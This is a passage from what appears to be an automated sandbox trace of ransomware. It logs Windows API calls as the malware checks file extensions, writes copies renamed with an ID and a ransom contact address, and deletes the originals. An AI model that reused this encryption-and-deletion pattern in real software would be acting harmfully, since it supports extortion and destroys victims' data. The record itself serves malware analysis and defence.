Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.672] lstrlenW (lpString=".zip") returned 4 [0058.672] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.672] lstrlenW (lpString=".rar") returned 4 [0058.672] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.672] lstrlenW (lpString=".bz2") returned 4 [0058.672] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.672] lstrlenW (lpString=".7z") returned 3 [0058.672] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.673] lstrlenW (lpString=".dbf") returned 4 [0058.673] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.673] lstrlenW (lpString=".1cd") returned 4 [0058.673] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.673] lstrlenW (lpString=".jpg") returned 4 [0058.673] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.673] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.673] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.674] GetLastError () returned 0x0 [0058.674] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xb10, lpOverlapped=0x0) returned 1 [0059.164] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xb20, lpOverlapped=0x0) returned 1 [0059.180] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.180] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.181] SetEndOfFile (hFile=0x180) returned 1 [0059.185] CloseHandle (hObject=0x180) returned 1 [0059.185] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.185] SetEndOfFile (hFile=0x204) returned 1 [0059.186] CloseHandle (hObject=0x204) returned 1 [0059.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0059.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.186] lstrlenW (lpString=".doc") returned 4 [0059.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.186] lstrlenW (lpString=".docx") returned 5 [0059.187] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.187] lstrlenW (lpString=".pdf") returned 4 [0059.187] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString=".xls") returned 4 [0059.187] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.187] lstrlenW (lpString=".xlsx") returned 5 [0059.187] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.187] lstrlenW (lpString=".ppt") returned 4 [0059.187] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.187] lstrlenW (lpString=".zip") returned 4 [0059.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.187] lstrlenW (lpString=".rar") returned 4 [0059.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString=".bz2") returned 4 [0059.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString=".7z") returned 3 [0059.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.187] lstrlenW (lpString=".dbf") returned 4 [0059.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.187] lstrlenW (lpString=".1cd") returned 4 [0059.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0059.187] lstrlenW (lpString=".jpg") returned 4 [0059.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.189] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.189] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.189] GetLastError () returned 0x0 [0059.189] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xe30, lpOverlapped=0x0) returned 1 [0059.193] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe40, lpOverlapped=0x0) returned 1 [0059.194] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.194] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.194] SetEndOfFile (hFile=0x204) returned 1 [0059.194] CloseHandle (hObject=0x204) returned 1 [0059.194] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.194] SetEndOfFile (hFile=0x1fc) returned 1 [0059.195] CloseHandle (hObject=0x1fc) returned 1 [0059.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0059.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.196] lstrlenW (lpString=".doc") returned 4 [0059.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString=".docx") returned 5 [0059.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.196] lstrlenW (lpString=".pdf") returned 4 [0059.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString=".xls") returned 4 [0059.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.196] lstrlenW (lpString=".xlsx") returned 5 [0059.196] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.196] lstrlenW (lpString=".ppt") returned 4 [0059.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.196] lstrlenW (lpString=".zip") returned 4 [0059.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.196] lstrlenW (lpString=".rar") returned 4 [0059.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString=".bz2") returned 4 [0059.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString=".7z") returned 3 [0059.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.196] lstrlenW (lpString=".dbf") returned 4 [0059.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.197] lstrlenW (lpString=".1cd") returned 4 [0059.197] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0059.197] lstrlenW (lpString=".jpg") returned 4 [0059.197] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.198] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.198] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.198] GetLastError () returned 0x0 [0059.198] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xe20, lpOverlapped=0x0) returned 1 [0059.200] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe30, lpOverlapped=0x0) returned 1 [0059.201] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.201] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.201] SetEndOfFile (hFile=0x204) returned 1 [0059.202] CloseHandle (hObject=0x204) returned 1 [0059.202] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.202] SetEndOfFile (hFile=0x1fc) returned 1 [0059.202] CloseHandle (hObject=0x1fc) returned 1 [0059.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0059.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.203] lstrlenW (lpString=".doc") returned 4 [0059.203] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.203] lstrlenW (lpString=".docx") returned 5 [0059.203] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.203] lstrlenW (lpString=".pdf") returned 4 [0059.203] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.203] lstrlenW (lpString=".xls") returned 4 [0059.203] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.203] lstrlenW (lpString=".xlsx") returned 5 [0059.203] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.203] lstrlenW (lpString=".ppt") returned 4 [0059.203] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.203] lstrlenW (lpString=".zip") returned 4 [0059.203] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.203] lstrlenW (lpString=".rar") returned 4 [0059.203] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.203] lstrlenW (lpString=".bz2") returned 4 [0059.203] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.204] lstrlenW (lpString=".7z") returned 3 [0059.204] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.204] lstrlenW (lpString=".dbf") returned 4 [0059.204] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.204] lstrlenW (lpString=".1cd") returned 4 [0059.204] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0059.204] lstrlenW (lpString=".jpg") returned 4 [0059.204] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.204] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.204] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.205] GetLastError () returned 0x0 [0059.205] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x85c, lpOverlapped=0x0) returned 1 [0059.206] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x860, lpOverlapped=0x0) returned 1 [0059.207] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.207] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.207] SetEndOfFile (hFile=0x204) returned 1 [0059.207] CloseHandle (hObject=0x204) returned 1 [0059.207] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.207] SetEndOfFile (hFile=0x1fc) returned 1 [0059.208] CloseHandle (hObject=0x1fc) returned 1 [0059.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0059.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.209] lstrlenW (lpString=".doc") returned 4 [0059.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString=".docx") returned 5 [0059.209] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.209] lstrlenW (lpString=".pdf") returned 4 [0059.209] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString=".xls") returned 4 [0059.209] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.209] lstrlenW (lpString=".xlsx") returned 5 [0059.209] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.209] lstrlenW (lpString=".ppt") returned 4 [0059.209] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.209] lstrlenW (lpString=".zip") returned 4 [0059.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.209] lstrlenW (lpString=".rar") returned 4 [0059.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString=".bz2") returned 4 [0059.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString=".7z") returned 3 [0059.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.209] lstrlenW (lpString=".dbf") returned 4 [0059.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.210] lstrlenW (lpString=".1cd") returned 4 [0059.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0059.210] lstrlenW (lpString=".jpg") returned 4 [0059.210] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.210] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.210] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.210] GetLastError () returned 0x0 [0059.210] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xadc, lpOverlapped=0x0) returned 1 [0059.212] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xae0, lpOverlapped=0x0) returned 1 [0059.213] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.213] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.213] SetEndOfFile (hFile=0x204) returned 1 [0059.213] CloseHandle (hObject=0x204) returned 1 [0059.213] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.213] SetEndOfFile (hFile=0x1fc) returned 1 [0059.214] CloseHandle (hObject=0x1fc) returned 1 [0059.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0059.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.214] lstrlenW (lpString=".doc") returned 4 [0059.214] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.214] lstrlenW (lpString=".docx") returned 5 [0059.214] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.215] lstrlenW (lpString=".pdf") returned 4 [0059.215] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString=".xls") returned 4 [0059.215] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.215] lstrlenW (lpString=".xlsx") returned 5 [0059.215] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.215] lstrlenW (lpString=".ppt") returned 4 [0059.215] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.215] lstrlenW (lpString=".zip") returned 4 [0059.215] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.215] lstrlenW (lpString=".rar") returned 4 [0059.215] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString=".bz2") returned 4 [0059.215] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString=".7z") returned 3 [0059.215] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.215] lstrlenW (lpString=".dbf") returned 4 [0059.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.215] lstrlenW (lpString=".1cd") returned 4 [0059.215] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0059.215] lstrlenW (lpString=".jpg") returned 4 [0059.215] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.216] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.216] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.216] GetLastError () returned 0x0 [0059.216] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xaec, lpOverlapped=0x0) returned 1 [0059.218] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, 